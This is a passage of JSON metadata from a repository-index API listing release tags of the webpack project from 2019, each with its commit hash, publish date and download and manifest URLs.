_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.3/manifests"},{"name":"v5.0.0-alpha.22","sha":"4bd900e790611f32431d46ec4af559bc90d267ff","kind":"tag","published_at":"2019-08-23T13:16:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.22","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.22/manifests"},{"name":"v5.0.0-alpha.21","sha":"2a7f242968c2597fb9b955645fe7f4b57b61d62e","kind":"tag","published_at":"2019-08-22T19:01:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.21","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.21/manifests"},{"name":"v5.0.0-alpha.20","sha":"8e1ea8385d10c13c15c79eb9c4146e071ef8d565","kind":"tag","published_at":"2019-08-14T08:21:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.20","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.20/manifests"},{"name":"v4.39.2","sha":"7265427acf9cd4f0f36f05c1ba16a0abedb7bbc1","kind":"tag","published_at":"2019-08-13T17:45:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.2/manifests"},{"name":"v5.0.0-alpha.19","sha":"1aefa1116b7d54e445e606aa4cffb3a4ec82cd7a","kind":"tag","published_at":"2019-08-06T14:37:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.19","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.19/manifests"},{"name":"v4.39.1","sha":"f29445d46624ef4726465e27bbe6e003aa07f8be","kind":"tag","published_at":"2019-08-02T12:35:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.1/manifests"},{"name":"v4.39.0","sha":"5344837ed67479b838ad07ff353919d41f5d2b9f","kind":"tag","published_at":"2019-08-01T15:30:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.0/manifests"},{"name":"v4.38.0","sha":"ae3db13d7db6dbcdc27f2f3095b532c60c9de1c9","kind":"tag","published_at":"2019-07-26T07:26:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.38.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.38.0/manifests"},{"name":"v4.37.0","sha":"04b0d6b4eaa0e18629998e28f795914291c34723","kind":"tag","published_at":"2019-07-23T09:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.37.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.37.0/manifests"},{"name":"v4.36.1","sha":"92caa5de066ded4232a119752bd5dde1497606ef","kind":"tag","published_at":"2019-07-17T13:58:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.36.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.1/manifests"},{"name":"v4.36.0","sha":"95d21bb39a1e700f28be776b300492c50a169fc7","kind":"tag","published_at":"2019-07-17T11:32:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.36.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.0/manifests"},{"name":"v5.0.0-alpha.18","sha":"9d05b680f02b7bdae81eff47a18f95d1f21ed053","kind":"tag","published_at":"2019-07-08T20:25:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.18","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.18/manifests"},{"name":"v4.35.3","sha":"4ec90ceba4206aeb91d4c0f7e12dc889d238001e","kind":"tag","published_at":"2019-07-08T13:53:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.3/manifests"},{"name":"v5.0.0-alpha.17","sha":"7ade38d01107be2f55277b61fb683341884cdc7c","kind":"tag","published_at":"2019-07-01T10:22:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.17","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.17/manifests"},{"name":"v4.35.2","sha":"bf3e869a423a60581dcb64e215b8d14403e997f2","kind":"tag","published_at":"2019-07-01T09:18:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.2/manifests"},{"name":"v4.35.1","sha":"569dd6a2d2e31f218578c79a4b25dfe61baf6c08","kind":"tag","published_at":"2019-07-01T09:07:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.1/manifests"},{"name":"v4.35.0","sha":"c3377ef76ec708ed9c55314e8386f438abea178c","kind":"tag","published_at":"2019-06-19T19:15:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.0/manifests"},{"name":"v5.0.0-alpha.16","sha":"56b8aa7006df3c7c9d6634dd11fc6a9f5bac9644","kind":"tag","published_at":"2019-06-14T13:25:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.16","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.16/manifests"},{"name":"v4.34.0","sha":"34c86675728430c0f41fe415dbbacf87b5a2875d","kind":"tag","published_at":"2019-06-12T23:10:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.34.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.34.0/manifests"},{"name":"v5.0.0-alpha.15","sha":"224daec09d68f17ef705eafc9ecafeb3fa7fd7a9","kind":"tag","published_at":"2019-06-05T16:38:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.15","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.15/manifests"},{"name":"v4.33.0","sha":"d45bec3518f53153287ff2cad3cfae9d2b248d9a","kind":"tag","published_at":"2019-06-04T19:32:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.33.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.33.0/manifests"},{"name":"v5.0.0-alpha.14","sha":"0037e7355a147cf0fe8df9c56f1b9515b1a87f88","kind":"tag","published_at":"2019-05-23T07:32:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.14","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.14/manifests"},{"name":"v4.32.2","sha":"5d3004cccd3dd5af2721c39a7a8a27b12b3d0c19","kind":"tag","published_at":"2019-05-22T23:11:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.2/manifests"},{"name":"v4.32.1","sha":"87fc33edbec46f721a2186194f2bc0c8fc14b464","kind":"tag","published_at":"2019-05-22T06:30:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.1/manifests"},{"name":"v5.0.0-alpha.13","sha":"8d05c28e9c679f77cd054a84e261525773092b06","kind":"tag","published_at":"2019-05-20T12:55:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.13","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.13/manifests"},{"name":"v4.32.0","sha":"bbe71d89cb7a8c1cc81ce1e17929d8de2260ff80","kind":"tag","published_at":"2019-05-20T09:53:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.0/manifests"},{"name":"v5.0.0-alpha.12","sha":"e72fed4877c59d6d842a3596328c6e045d2b5eca","kind":"tag","published_at":"2019-05-10T22:40:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.12","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.12/manifests"},{"name":"v4.31.0","sha":"2e1e1799b1fc56b68dbddbe8712ff6393654ccbd","kind":"tag","published_at":"2019-05-09T07:56:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.31.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.31.0/manifests"},{"name":"v4.30.0","sha":"b72b96a2bc5d2c7a308d0943567e0db191d3c358","kind":"tag","published_at":"2019-04-12T20:06:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.30.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.30.0/manifests"},{"name":"v4.29.6","sha":"685a0626cb10664133ef2fb2e2f9f4cb3971402a","kind":"tag","published_at":"2019-02-28T09:44:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.6","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.6/manifests"},{"name":"v5.0.0-alpha.11","sha":"589e4e4d9d42401d638c442e5b83bb28213b614a","kind":"tag","published_at":"2019-02-19T10:50:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.11","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.11/manifests"},{"name":"v4.29.5","sha":"073813f1913e000302be557272b2d11195f9c2e6","kind":"tag","published_at":"2019-02-18T10:05:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.5/manifests"},{"name":"v4.29.4","sha":"7ecf992bd97204fbfaeed18e3e21fb9fcd46352f","kind":"tag","published_at":"2019-02-15T15:10:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.4/manifests"},{"name":"v5.0.0-alpha.10","sha":"2d7338d2b5cc70c6bd250a878d8a9717cc02cb95","kind":"tag","published_at":"2019-02-07T08:49:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.10","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.10/manifests"},{"name":"v4.29.3","sha":"b934e26da8b65bdf36b3c71141d0c2d8397d9f44","kind":"tag","published_at":"2019-02-07T08:22:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.3/manifests"},{"name":"v4.29.2","sha":"74b8aac0adfb0c79d70a99fa86635930db8944fd","kind":"tag","published_at":"2019-02-06T14:05:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.2/manifests"},{"name":"v4.29.1","sha":"6934b9814492b049e67efb3ccf7254d8917e01f9","kind":"tag","published_at":"2019-02-04T17:01:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.1/manifests"},{"name":"v5.0.0-alpha.9","sha":"92a36b1a9c0ed554c0f7e74bf1bc98c77a768fcc","kind":"tag","published_at":"2019-01-27T12:18:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.9/manifests"},{"name":"v4.29.0","sha":"25bccd4c487a5bf743efc62947d81a8eaa81a90f","kind":"tag","published_at":"2019-01-20T17:38:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.0/manifests"},{"name":"v5.0.0-alpha.8","sha":"adff7f61a2595ea9a04c0f3070add21be01607fb","kind":"tag","published_at":"2019-01-19T19:24:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.8/manifests"},{"name":"v5.0.0-alpha.7","sha":"18aca2fcb148d04ba3d0b37742f50534d42a7ec3","kind":"tag","published_at":"2019-01-19T12:11:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.7/manifests"},{"name":"v5.0.0-alpha.6","sha":"4be6797700753a54b223600f01e941580b6a6ba3","kind":"tag","published_at":"2019-01-15T16:39:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.6/manifests"},{"name":"v4.28.4","sha":"fdb6b139b94273e5b18870262c193a93f65132e8","kind":"tag","published_at":"2019-01-10T15:48:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.4/manifests"},{"name":"v5.0.0-alpha.5","sha":"0d9ed482bc39fb23040ffd26823e0b7ed73320cb","kind":"tag","published_at":"2019-01-09T14:20:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.5/manifests"},{"name":"v5.0.0-alpha.4","sha":"b97bc4bc062cd5395de8b00115519472645d57d0","kind":"tag","published_at":"2019-01-08T14:09:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.4","manifests_url":"https://repos.ecosyste